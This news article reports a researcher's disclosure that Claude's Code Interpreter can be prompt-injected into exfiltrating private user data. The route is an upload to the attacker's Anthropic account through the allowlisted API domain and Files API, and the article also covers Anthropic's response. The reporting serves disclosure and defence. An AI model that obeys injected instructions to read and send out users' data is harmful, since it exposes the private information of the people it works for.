Claude can be tricked into sending your private company data to hackers - all it takes is some kind words

Claude Memory
(Image credit: Anthropic)

  • Claude’s Code Interpreter can be exploited to exfiltrate private user data via prompt injection
  • Researcher tricked Claude into uploading sandboxed data to his Anthropic account using API access
  • Anthropic now treats such vulnerabilities as reportable and urges users to monitor or disable access

Claude one of the more popular AI tools out there, carries a vulnerability which allows threat actors to exfiltrate private user data, experts have warned.

Cybersecurity researcher Johann Rehberger, AKA Wunderwuzzi, who recently wrote an in-depth report on his findings, finding at the heart of the problem is Claude’s Code Interpreter, a sandboxed environment that lets AI write and run code (for example, to analyze data or generate files) directly within a conversation.

Recently, Code Interpreter gained the ability to make network requests, which allows it to connect to the internet and, for example, download software packages.

Keeping an eye on Claude

By default, Anthropic’s Claude is supposed to access only “safe” domains like GitHub or PyPI, but among the approved domains is api.anthropic.com (the same API Claude itself uses), which opened the door for exploitation.

Wunderwuzzi showed he was able to trick Claude into reading private user data, save that data inside the sandbox, and upload it to his Anthropic account using his own API key, via Claude’s Files API.

In other words, even though the network access seems restricted, the attacker can manipulate the model via prompt injection to exfiltrate user data. The exploit could transfer up to 30 MB per file, and multiple files could be uploaded.

Wunderwuzzi disclosed his findings to Anthropic via HackerOne, and even though the company initially classified it as a “model safety issue,” not a “security vulnerability,” it later acknowledged that such exfiltration bugs are in scope for reporting. At first, Anthropic said users should “monitor Claude while using the feature and stop it if you see it using or accessing data unexpectedly.”

A subsequent update said: “Anthropic has confirmed that data exfiltration vulnerabilities such as this one are in-scope for reporting, and this issue should not have been closed as out-of-scope,” he said in the report. “There was a process hiccup they will work on addressing.”

His suggestion to Anthropic is to limit Claude’s network communications to the user’s own account only, and users should monitor Claude’s activity closely or disable network access if concerned.

Via The Register


Best antivirus software header
The best antivirus for all budgets

Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews, and opinion in your feeds. Make sure to click the Follow button!

And of course you can also follow TechRadar on TikTok for news, reviews, unboxings in video form, and get regular updates from us on WhatsApp too.

TOPICS

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.

You must confirm your public display name before commenting

Please logout and then login again, you will then be prompted to enter your display name.